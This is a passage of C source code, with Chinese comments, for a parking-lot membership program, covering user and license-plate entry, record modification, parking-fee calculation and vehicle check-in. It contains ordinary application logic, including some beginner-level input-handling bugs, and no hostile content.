录入第一辆车\r\n\t\t{\r\n\t\t\tflag=1;\r\n\t\t\tdo\r\n\t\t\t{\r\n\t\t\t\tflag=1;\r\n\t\t\t\tprintf(\"输入由字母与数字组成的车牌号:\");\r\n\t\t\t\tscanf(\"%s\",&ucid1);\t\r\n\t\t\t\tif(strcmp(ucid1,\"0\")==0)\r\n\t\t\t\t{\r\n\t\t\t\t\tflag=0;\r\n\t\t\t\t\tprintf(\"用户至少有一辆车!\");\r\n\t\t\t\t}\r\n\t\t\t\tfor(k=0;ucid1[k]!='\\0' && flag;k++)\r\n\t\t\t\t\tif(isalnum(ucid1[k])==0)\r\n\t\t\t\t\t\tflag=0;\r\n\t\t\t}while(!flag);\r\n\r\n\t\t\tfor(j=0;j<i && flag;j++)\r\n\t\t\t{\r\n\t\t\t\tif((strcmp(user[j].carid1,ucid1))==0 || (strcmp(user[j].carid2,ucid1))==0)\r\n\t\t\t\t{\r\n\t\t\t\t\tprintf(\"该车已存在!\");\r\n\t\t\t flag=0;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}while(!flag);\r\n\r\n\t\tdo //录入第二辆车\r\n\t\t{\r\n\t\t\tflag=1;\r\n\t\t\tdo\r\n\t\t\t{\r\n\t\t\t\tflag=1;\r\n\t\t\t\tprintf(\"若有第二辆车,请输入由字母与数字组成的车牌号,若没有请输入0:\");\r\n\t\t\t\tscanf(\"%s\",&ucid2);\t\r\n\t\t\t\tfor(k=0;ucid2[k]!='\\0' && flag;k++)\r\n\t\t\t\t\tif(isalnum(ucid2[k])==0)\r\n\t\t\t\t\t\tflag=0;\r\n\t\t\t\r\n\t\t\t\tif(strcmp(ucid1,ucid2)==0)\r\n\t\t\t\t{\r\n\t\t\t\t\tprintf(\"该车牌号刚才输入过了! 
\");\r\n\t\t\t\t\tflag=0;\r\n\t\t\t\t};\r\n\t\t\t}while(!flag);\r\n\r\n\t\t\tif((strcmp(ucid2,\"0\"))!=0)\r\n\t\t\t\tfor(j=0;j<i;j++)\r\n\t\t\t\t{\r\n\t\t\t\t\tif((strcmp(user[j].carid2,ucid2))==0 || (strcmp(user[j].carid1,ucid2))==0)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tprintf(\"该车已存在!\");\r\n\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t}while(!flag);\r\n\r\n\t\tif(flag)\r\n\t\t{\r\n\t\t\tstrcpy(user[i].id,uid);\r\n\t\t\tstrcpy(user[i].carid1,ucid1);\r\n\t\t\tstrcpy(user[i].carid2,ucid2);\r\n\t\t\tdo\r\n\t\t\t{\r\n\t\t\t\tprintf(\"卡类型(year/time):\"); //输入卡类型\r\n\t\t\t\tscanf(\"%s\",tcard);\r\n\r\n\t\t\t\tif((strcmp(tcard,\"year\"))==0) //年卡输入有效期\r\n\t\t\t\t{\r\n\t\t\t\t\tdo \r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tflag=1;\r\n\t\t\t\t\t\tprintf(\"请输入有效使用期:\");\r\n\t\t\t\t\t\tscanf(\"%s\",&va);\r\n\t\t\t\t\t\tif(strlen(va)!=6)\r\n\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\tfor(k=0;va[k]!='\\0' && flag;k++)\r\n\t\t\t\t\t\t\tif(isdigit(va[k])==0)\r\n\t\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\tif(flag)\r\n\t\t\t\t\t\t\tv=atol(va);\r\n\t\t\t\t\t\tif(v<=time) //有效期与今日时间对比\r\n\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t}while(!flag);\r\n\t\t\t\t\tuser[i].valid=v;\r\n\t\t\t\t\tstrcpy(user[i].card,\"year\");\r\n\t\t\t\t\tbreak;\r\n\t\t\t\t}\r\n\t\t\t\telse if((strcmp(tcard,\"time\"))==0)\r\n\t\t\t\t{\r\n\t\t\t\t\tdo //次卡输入有效次数\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tflag=1;\r\n\t\t\t\t\t\tprintf(\"请输入有效次数(一次性输入最大使用次数为30):\");\r\n\t\t\t\t\t\tscanf(\"%s\",&va);\r\n\t\t\t\t\t\tfor(k=0;va[k]!='\\0' && flag;k++)\r\n\t\t\t\t\t\t\tif(isdigit(va[k])==0)\r\n\t\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\t\tif(flag)\r\n\t\t\t\t\t\t\t\tv=atoi(va);\r\n\t\t\t\t\t\t\t\tif(v>30 || v<=0)\r\n\t\t\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t}while(!flag);\r\n\t\t\t\t\tuser[i].valid=v;\r\n\t\t\t\t\tstrcpy(user[i].card,\"time\");\r\n\t\t\t\t\tbreak;\r\n\t\t\t\t}\r\n\t\t\t}while(flag);\r\n\r\n\t\t\tstrcpy(user[i].car1in,\"车辆未进入\");\r\n\t\t\tstrcpy(user[i].car2in,\"车辆未进入\");\r\n\t\t\tif((strcmp(user[i].carid2,\"0\"))==0)\r\n\t\t\t\tstrcpy(user[i].car2in,\"无车辆\");\r\n\t\t\tprintf(\"\\n\");\r\n\t\t};\r\n\t\tcount+=1;\r\n\t};\r\n\tprintf(\"OK!\\n\");\r\n\tm=m+count;\r\n\tsave(m); //保存\r\n\tfclose(fp);\r\n};\r\n\r\nvoid modify() //修改信息函数\r\n{ \r\n\tint q,f,loc=-1,i,k,j,ss,x; //loc代表用户序号\r\n\tint m=load();\r\n\tchar id[6],cid[6];\r\n\tdo\r\n\t{\r\n\t\tf=1;\r\n\t\tprintf(\"按用户id修改请选择1,按车牌修改请选择2,放弃修改选择3:\");\r\n\t\tscanf(\"%d\",&q);\r\n\t\tif(q>=1&&q<=3)\r\n\t\t{\r\n\t\t\tf=1;\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\tf=0;\r\n\t\t\tprintf(\"无效的选择!\\n\");\r\n\t\t}\r\n\t}while(!f); \r\n\r\n\tswitch(q)\r\n\t{\r\n\tcase 1:\r\n\t\tprintf(\"请输入要修改的用户id:\");\r\n\t\tscanf(\"%s\",id);\r\n\t\tfor(i=0;i<m;i++)\r\n\t\t{\r\n\t\t\tif(strcmp(user[i].id,id)==0) // 先检查是否存在该用户id\r\n\t\t\t{\r\n\t\t\t\tloc=i;\r\n\t\t\t}\r\n\t\t}\r\n\t\tbreak;\r\n\tcase 2:\r\n\t\tprintf(\"请输入要修改信息的用户的车牌号:\");\r\n\t\tscanf(\"%s\",&cid);\r\n\t\tfor(i=0;i<m;i++)\r\n\t\t{\r\n\t\t\tif(strcmp(user[i].carid1,cid)==0 || strcmp(user[i].carid2,cid)==0)\r\n\t\t\t{\r\n\t\t\t\tloc=i;\r\n\t\t\t}\r\n\t\t}\t\t\r\n\tbreak;\r\n\tdefault:break;\r\n\t}\r\n\r\n\tint flag=0,c;\r\n\tchar card[4],t[7],c1id[6],c2id[6],va[6];\r\n\tlong v=0,td;\r\n\r\n\tif(loc==-1){\r\n\t\tprintf(\"该用户不存在!\");\r\n\t}\r\n\telse{ // 输出该用户信息,决定是否要修改\r\n\t\tint 
n;\r\n\t\tprintf(\"该用户信息为:\\n\");\r\n\t\tprintf(\"\\t%s,\\t%s,\\t%d,\\t%s,\\t%s,\\t%s,\\t%s\\n\",user[loc].id,user[loc].card,user[loc].valid,user[loc].carid1,user[loc].carid2,user[loc].car1in,user[loc].car2in);\r\n\t\tprintf(\"确定修改该用户请选择1,放弃修改请选择0:\");\r\n\t\tscanf(\"%d\",&n);\r\n\t\tif(n==1)\r\n\t\t{\r\n\t\t\tprintf(\"\\n1.id 2.卡类型 3.有效日期/有效时间 4.车牌号\\n\");\r\n\t\t\tdo\r\n\t\t\t{\r\n\t\t\t\tflag=1;\r\n\t\t\t\tprintf(\"请输入您要修改的序号:\");\r\n\t\t\t\tscanf(\"%d\",&c);\r\n\t\t\t\tif(c>4 || c<1)\r\n\t\t\t\t{\r\n\t\t\t\t\tflag=0;\r\n\t\t\t\t\tprintf(\"无效的选择,请重新选择:\");\r\n\t\t\t\t}\r\n\t\t\t}while(!flag);\r\n\t\t}\r\n\t}\r\n\r\n\tif(!flag){return;}\r\n\r\n\tdo\r\n\t{\r\n\t\tswitch(c)\r\n\t\t{\r\n\t\tcase 1:\r\n\t\t\tdo\r\n\t\t\t{\r\n\t\t\t\tflag=1;\r\n\t\t\t\tdo\r\n\t\t\t\t{\r\n\t\t\t\t\tprintf(\"请输入由数字与字母组成的修改后的用户ID:\");\r\n\t\t\t\t\tscanf(\"%s\",&id);\r\n\t\t\t\t\tflag=1;\r\n\t\t\t\t\tif(strlen(id)!=6){flag=0;}\r\n\t\t\t\t\tfor(k=0;id[k]!='\\0' && flag;k++)\r\n\t\t\t\t\t\tif(isalnum(id[k])==0)\r\n\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t}while(!flag);\r\n\t\t\t\tfor(j=0;j<m;j++) // 用户id查重\r\n\t\t\t\t{\r\n\t\t\t\t\tif((strcmp(user[j].id,id))==0) \r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tprintf(\"该id已存在,请重新输入:\");\r\n\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}while(!flag);\r\n\t\t\tstrcpy(user[loc].id,id);\r\n\t\t\tbreak;\r\n\r\n\t\tcase 2:\r\n\t\t\tprintf(\"请输入修改后的卡类型(year/time):\");\r\n\t\t\tscanf(\"%s\",card);\t\r\n\t\t\tif((strcmp(card,\"time\"))==0)\r\n\t\t\t{\r\n\t\t\t\tstrcpy(user[loc].card,card);\r\n\t\t\t\tdo\r\n\t\t\t\t{\r\n\t\t\t\t\tflag=1;\r\n\t\t\t\t\tprintf(\"请输入该卡有效次数:\");\r\n\t\t\t\t\tscanf(\"%s\",&va);\r\n\t\t\t\t\tfor(k=0;va[k]!='\\0' && flag;k++) //判断输入是否为数字,并且大于0,小于30\r\n\t\t\t\t\t\tif(isdigit(va[k])==0)\r\n\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\tif(flag)\r\n\t\t\t\t\t\tv=atoi(va);\r\n\t\t\t\t\t\tif(v>30 || v<=0)\r\n\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t}while(!flag);\r\n\t\t\t\tuser[loc].valid=v;\r\n\t\t\t}\t\r\n\t\t\telse if((strcmp(card,\"year\"))==0)\r\n\t\t\t{\r\n\t\t\t\tstrcpy(user[loc].card,card);\r\n\t\t\t\tdo\r\n\t\t\t\t{\r\n\t\t\t\t\tflag=1;\r\n\t\t\t\t\tprintf(\"请输入今日日期(例190212): \");\r\n\t\t\t\t\tscanf(\"%s\",&t);\r\n\t\t\t\t\tif(strlen(t)!=6) // 判断日期是否为6位,并且是数字\r\n\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\tfor(k=0;t[k]!='\\0' && flag;k++)\r\n\t\t\t\t\t\tif(isdigit(t[k])==0)\r\n\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t}while(!flag);\r\n\t\t\t\ttd=atol(t);\t\r\n\t\t\t\tdo\r\n\t\t\t\t{\r\n\t\t\t\t\tflag=1;\r\n\t\t\t\t\tprintf(\"请输入有效使用期:\");\r\n\t\t\t\t\tscanf(\"%s\",&va);\r\n\t\t\t\t\tif(strlen(va)!=6)\r\n\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\tfor(k=0;va[k]!='\\0' && flag;k++) // 有效期必须大于今日日期\r\n\t\t\t\t\t\tif(isdigit(va[k])==0)\r\n\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\tif(flag)\r\n\t\t\t\t\t\tv=atol(va);\r\n\t\t\t\t\t\tif(v<=td)\r\n\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t}while(!flag);\r\n\t\t\t\tuser[loc].valid=v;\r\n\t\t\t};\r\n\t\t\tbreak;\r\n\r\n\t\tcase 3:\r\n\t\t\tif((strcmp(user[loc].card,\"time\"))==0)\r\n\t\t\t{\r\n\t\t\t\tdo //修改有效次数\r\n\t\t\t\t{\r\n\t\t\t\t\tflag=1;\r\n\t\t\t\t\tprintf(\"请输入该卡有效次数:\");\r\n\t\t\t\t\tscanf(\"%s\",&va);\r\n\t\t\t\t\tfor(k=0;va[k]!='\\0' && flag;k++) \r\n\t\t\t\t\t\tif(isdigit(va[k])==0)\r\n\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\tif(flag)\r\n\t\t\t\t\t\tv=atoi(va);\r\n\t\t\t\t\t\tif(v>30 || v<=0)\r\n\t\t\t\t\t\t\tflag=0;\t\t\r\n\t\t\t\t}while(!flag);\r\n\t\t\t\tuser[loc].valid=v;\r\n\t\t\t}\r\n\t\t\telse if((strcmp(user[loc].card,\"year\"))==0)\r\n\t\t\t{\r\n\t\t\t\tdo //修改有效日期\r\n\t\t\t\t{\r\n\t\t\t\t\tflag=1;\r\n\t\t\t\t\tprintf(\"请输入今日日期(例190212): 
\");\r\n\t\t\t\t\tscanf(\"%s\",&t);\r\n\t\t\t\t\tif(strlen(t)!=6)\r\n\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\tfor(k=0;t[k]!='\\0' && flag;k++)\r\n\t\t\t\t\t\tif(isdigit(t[k])==0)\r\n\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t}while(!flag);\r\n\t\t\t\ttd=atol(t);\t\r\n\t\t\t\tdo\r\n\t\t\t\t{\r\n\t\t\t\t\tflag=1;\r\n\t\t\t\t\tprintf(\"请输入有效使用期:\");\r\n\t\t\t\t\tscanf(\"%s\",&va);\r\n\t\t\t\t\tif(strlen(va)!=6)\r\n\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\tfor(k=0;va[k]!='\\0' && flag;k++)\r\n\t\t\t\t\t\tif(isdigit(va[k])==0)\r\n\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\tif(flag)\r\n\t\t\t\t\t\tv=atol(va);\r\n\t\t\t\t\t\tif(v<=td)\r\n\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t}while(!flag);\r\n\t\t\t\tuser[loc].valid=v;\t\t\r\n\t\t\t};\r\n\t\t\tbreak;\r\n\r\n\t\tcase 4:\r\n\t\t\tif((strcmp(user[loc].carid1,\"0\")!=0) && (strcmp(user[loc].carid2 ,\"0\")!=0)) // 当用户有2辆车\r\n\t\t\t{\r\n\t\t\t\tprintf(\"该用户有2辆车,修改车辆1请按1,修改车辆2请按2,都要修改请按3,放弃修改请按4:\");\r\n\t\t\t\tscanf(\"%d\",&ss);\r\n\t\t\t\tif(ss==1) //修改车1\r\n\t\t\t\t{\r\n\t\t\t\t\tdo\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tdo\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tflag=1;\r\n\t\t\t\t\t\t\tprintf(\"输入由字母与数字组成的修改后的车牌号:\");\r\n\t\t\t\t\t\t\tscanf(\"%s\",&c1id);\t\r\n\t\t\t\t\t\t\tfor(k=0;c1id[k]!='\\0' && flag;k++) // 判断车牌号是否合理\r\n\t\t\t\t\t\t\t\tif(isalnum(c1id[k])==0)\r\n\t\t\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\t}while(!flag);\r\n\t\t\t\t\t\tif(strcmp(c1id,\"0\")!=0) // 验证车牌号是否存在\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tfor(j=0;j<m;j++)\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tif((strcmp(user[j].carid1,c1id)==0) || (strcmp(user[j].carid2,c1id)==0))\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\tprintf(\"该车牌号已存在,\");\r\n\t\t\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t};\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}while(!flag);\t\r\n\t\t\t\t\tif(strcmp(c1id,\"0\")==0)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tstrcpy(user[loc].carid1,user[loc].carid2);\r\n\t\t\t\t\t strcpy(user[loc].carid2,\"0\");\r\n\t\t\t\t\t\tstrcpy(user[loc].car2in,\"无车辆\");\r\n\t\t\t\t\t}\r\n\t\t\t\t\telse\r\n\t\t\t\t\t\tstrcpy(user[loc].carid1,c1id);\r\n\t\t\t\t\t\tprintf(\"修改成功!\");\r\n\t\t\t\t}\r\n\t\t\t\telse if(ss==2) // 修改车2\r\n\t\t\t\t{\r\n\t\t\t\t\tdo\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tdo\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tflag=1;\r\n\t\t\t\t\t\t\tprintf(\"请输入由字母与数字组成的修改后车辆2的车牌号:\");\r\n\t\t\t\t\t\t\tscanf(\"%s\",c2id);\r\n\t\t\t\t\t\t\tfor(k=0;c2id[k]!='\\0' && flag;k++)\r\n\t\t\t\t\t\t\t\tif(isalnum(c2id[k])==0)\r\n\t\t\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\t}while(!flag);\r\n\t\t\t\t\t\tif(strcmp(c2id,\"0\")!=0)\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tfor(j=0;j<m;j++)\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tif((strcmp(user[j].carid1,c2id)==0) || (strcmp(user[j].carid2,c2id)==0))\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\tprintf(\"该车牌号已存在,\");\r\n\t\t\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t};\r\n\t\t\t\t\t\t};\r\n\t\t\t\t\t}while(!flag);\r\n\t\t\t\t\tif(strcmp(c2id,\"0\")==0)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tstrcpy(user[loc].carid2,c2id);\r\n\t\t\t\t\t\tstrcpy(user[loc].car2in,\"无车辆\");\r\n\t\t\t\t\t};\r\n\t\t\t\t\tstrcpy(user[loc].carid2,c2id);\r\n\t\t\t\t\tprintf(\"修改成功!\");\r\n\t\t\t\t}\r\n\t\t\t\telse if(ss==3) //全修改\r\n\t\t\t\t{\r\n\t\t\t\t\tdo\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tdo\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tflag=1;\r\n\t\t\t\t\t\t\tprintf(\"输入由字母与数字组成的修改后的车牌号1:\");\r\n\t\t\t\t\t\t\tscanf(\"%s\",&c1id);\t\r\n\t\t\t\t\t\t\tfor(k=0;c1id[k]!='\\0' && 
flag;k++)\r\n\t\t\t\t\t\t\t\tif(isalnum(c1id[k])==0)\r\n\t\t\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\t\tif(strcmp(c1id,\"0\")==0)\r\n\t\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\t}while(!flag);\r\n\t\t\t\t\t\tif(strcmp(c1id,\"0\")!=0)\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tfor(j=0;j<m;j++)\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tif((strcmp(user[j].carid1,c1id)==0) || (strcmp(user[j].carid2,c1id)==0))\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\tprintf(\"该车牌号已存在,\");\r\n\t\t\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t};\r\n\t\t\t\t\t\t};\r\n\t\t\t\t\t}while(!flag);\t\t\t\t\r\n\t\t\t\t\tstrcpy(user[loc].carid1,c1id);\r\n\t\t\t\t\tdo\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tdo\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tflag=1;\r\n\t\t\t\t\t\t\tprintf(\"请输入由字母与数字组成的修改后车辆2的车牌号:\");\r\n\t\t\t\t\t\t\tscanf(\"%s\",c2id);\r\n\t\t\t\t\t\t\tfor(k=0;c2id[k]!='\\0' && flag;k++)\r\n\t\t\t\t\t\t\t\tif(isalnum(c2id[k])==0)\r\n\t\t\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\t}while(!flag);\r\n\r\n\t\t\t\t\t\tif(strcmp(c2id,\"0\")!=0)\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tfor(j=0;j<m;j++)\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tif((strcmp(user[j].carid1,c1id)==0) || (strcmp(user[j].carid2,c1id)==0))\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\tprintf(\"该车牌号已存在,\");\r\n\t\t\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}while(!flag);\r\n\t\t\t\t\tif(strcmp(c2id,\"0\")==0)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tstrcpy(user[loc].carid2,c2id);\r\n\t\t\t\t\t\tstrcpy(user[loc].car2in,\"无车辆\");\r\n\t\t\t\t\t};\r\n\t\t\t\t\tstrcpy(user[loc].carid2,c2id);\r\n\t\t\t\t\tprintf(\"修改成功!\");\r\n\t\t\t\t}\r\n\t\t\t\t//else\r\n\t\t\t\t//\tbreak;\r\n\t\t\t}\r\n\r\n\t\t\telse if((strcmp(user[loc].carid1 ,\"0\")!=0) && (strcmp(user[loc].carid2,\"0\")==0)) // 若用户仅拥有一辆车\r\n\t\t\t{\r\n\t\t\t\tprintf(\"该用户有一台车,确认修改请按1,添加车辆请按2,取消修改请按0: \");\r\n\t\t\t\tscanf(\"%d\",&ss);\r\n\t\t\t\tif(ss==1) // 修改车辆1\r\n\t\t\t\t{\r\n\t\t\t\t\tdo\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tdo\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tflag=1;\r\n\t\t\t\t\t\t\tprintf(\"输入由字母与数字组成的修改后的车牌号:\");\r\n\t\t\t\t\t\t\tscanf(\"%s\",&c1id);\t\r\n\t\t\t\t\t\t\tfor(k=0;c1id[k]!='\\0' && flag;k++)\r\n\t\t\t\t\t\t\t\tif(isalnum(c1id[k])==0)\r\n\t\t\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\t\tif(strcmp(c1id,\"0\")==0)\r\n\t\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\t}while(!flag);\r\n\t\t\t\t\t\tfor(j=0;j<m;j++)\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tif((strcmp(user[j].carid1,c1id)==0) || (strcmp(user[j].carid2,c1id)==0))\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tprintf(\"该车牌号已存在,\");\r\n\t\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}while(!flag);\t\t\t\t\t\t\t\r\n\t\t\t\t\tstrcpy(user[loc].carid1,c1id);\r\n\t\t\t\t\tprintf(\"修改成功!\");\r\n\t\t\t\t}\r\n\t\t\t\telse if(ss==2) //添加车辆2\r\n\t\t\t\t{\r\n\t\t\t\t\tdo\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tflag=1;\r\n\t\t\t\t\t\tdo\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tprintf(\"输入由字母与数字组成的车牌号:\");\r\n\t\t\t\t\t\t\tscanf(\"%s\",&c2id);\r\n\t\t\t\t\t\t\tfor(k=0;c2id[k]!='\\0' && flag;k++)\r\n\t\t\t\t\t\t\t\tif(isalnum(c2id[k])==0)\r\n\t\t\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\t}while(!flag);\r\n\t\t\t\t\t\tfor(j=0;j<m;j++)\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tif((strcmp(user[j].carid1,c2id)==0) || 
(strcmp(user[j].carid2,c2id)==0))\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\tprintf(\"该车牌号已存在,\");\r\n\t\t\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t}while(!flag);\r\n\t\t\t\t\tstrcpy(user[loc].carid2,c2id);\r\n\t\t\t\t\tstrcpy(user[loc].car2in,\"车辆未进入\");\r\n\t\t\t\t\tprintf(\"修改成功!\");\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\tprintf(\"\\n\");\r\n\t\tprintf(\"确定保存修改的信息(1/0),如选0,则重新修改?\");\r\n\t\tscanf(\"%d\",&flag);\r\n\t}while(!flag);\r\n\r\n\tsave(m);\r\n\tdisplay();\r\n\tprintf(\"\\n修改结束请按0,继续修改请按1:\"); //如果继续修改,清空桌面,重新运行一次\r\n\tscanf(\"%d\",&x);\r\n\tswitch(x)\r\n\t{\r\n\tcase 0:\r\n\t\tsystem(\"cls\");\r\n\t\tbreak;\r\n\tcase 1:\r\n\t\tmodify();\r\n\t\tbreak;\r\n\tdefault:system(\"cls\");break;\r\n\t}\r\n}\r\n\r\nbool isleap(int year){ // 判断是否为闰年\r\n\t return (year%4==0 && year%100!=0 || year%400==0);\r\n}\r\n\r\n//计算停车费用\r\nlong fee(long Time_in,long Hour_in,long Time_out,long Hour_out)\r\n{\r\n\t//导入进出时间后,将其分解为年,月,日,时,分\r\n int y1,m1,d1,h1,s1;\r\n int y2,m2,d2,h2,s2;\r\n int day=0;\r\n long hour,p;\r\n y1=Time_in/10000,m1=Time_in%10000/100,d1=Time_in%100,h1=Hour_in/100,s1=Hour_in%100;\r\n y2=Time_out/10000,m2=Time_out%10000/100,d2=Time_out%100,h2=Hour_out/100,s2=Hour_out%100;\r\n while (y1<y2 || m1<m2 || d1<d2){ //计算进出时间相差多少天\r\n d1++;\r\n if (d1==month[m1][isleap(y1)]+1){\r\n m1++;\r\n d1=1;\r\n }\r\n if(m1==13){\r\n y1++;\r\n m1=1;\r\n }\r\n day++;\r\n };\r\n hour=h2-h1; // 计算小时差\r\n if(s2-s1>0)\r\n hour++;\r\n\thour=hour+24*day;\r\n p=5+3*(hour-1); // 计算费用\r\n return p;\r\n};\r\n\r\nvoid carin(){\r\n\tFILE* fp;\r\n\tint m=load();\r\n\tint i,n,j,k=0,flag,tag,loc=-1,f; //tag代表车1还是车2\r\n\tbool ft=true;\r\n\tchar car[6],time[12],tim[6];\r\n\tchar sto[7];\r\n\tlong v;\r\n\tdo\r\n\t{\r\n\t\tflag=1;\r\n\t\tprintf(\"请输入车牌号:\"); // 确定车牌号\r\n\t\tscanf(\"%s\",car);\r\n\t\tfor(i=0;car[i]!='\\0' && flag;i++)\r\n\t\t{\r\n\t\t\tif(isalnum(car[i])==0)\r\n\t\t\t\tflag=0;\r\n\t\t}\r\n\t}while(!flag);\r\n\tstrcpy(sto,car);\r\n\r\n\tfor(i=0;i<m;i++)\t\t\t\t\t\t\t\t\t\t//检索该车牌的车主,确定进入的车辆是车1还是车2\r\n\t{\r\n\t\tif(strcmp(user[i].carid1,sto)==0)\r\n\t\t{\r\n\t\t\ttag=1;\r\n\t\t\tloc=i;\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\telse if(strcmp(user[i].carid2,sto)==0)\r\n\t\t{\r\n\t\t\ttag=2;\r\n\t\t\tloc=i;\r\n\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\r\n\tdo\r\n\t{\r\n\t\tflag=1;\r\n\t\tprintf(\"请输入入场时间(省略':'精确到分):\"); // 输入进入时间\r\n\t\tscanf(\"%s\",time);\r\n\t\tif(strlen(time)!=12)\r\n\t\t\tflag=0;\r\n\t\tfor(i=0;time[i]!='\\0' && flag;i++)\r\n\t\t{\r\n\t\t\tif(isdigit(time[i])==0)\r\n\t\t\t\tflag=0;\r\n\t\t}\r\n\t}while(!flag);\r\n\r\n\tif(loc!=-1){ //loc为该用户在数组中的位置\r\n\t\tif(strcmp(user[loc].card,\"year\")==0)\r\n\t\t{\r\n\t\t\tstrncpy(tim,time+2,6);\r\n\t\t\tv=atol(tim);\r\n\t\t\tif(v>=user[loc].valid){ft=false;} \r\n\t\t};\r\n\r\n\t\tif(ft){ // ft是true代表会员没到期\r\n\t\t\tif(tag==1) //tag代表等待进入的是车主的几号车\r\n\t\t\t{\r\n\t\t\t\tif(strcmp(user[loc].car2in,\"vip\")==0)\r\n\t\t\t\t\tstrcpy(user[loc].car1in,time);\r\n\t\t\t\telse if(strcmp(user[loc].car2in,\"无车辆\")==0 || strcmp(user[loc].car2in,\"车辆未进入\")==0)\r\n\t\t\t\t\tstrcpy(user[loc].car1in,\"vip\");\r\n\t\t\t}\r\n\t\t\telse if(tag==2)\r\n\t\t\t{\r\n\t\t\t\tif(strcmp(user[loc].car1in,\"vip\")==0)\r\n\t\t\t\t\tstrcpy(user[loc].car2in,time);\r\n\t\t\t\telse if(strcmp(user[loc].car1in,\"无车辆\")==0 || 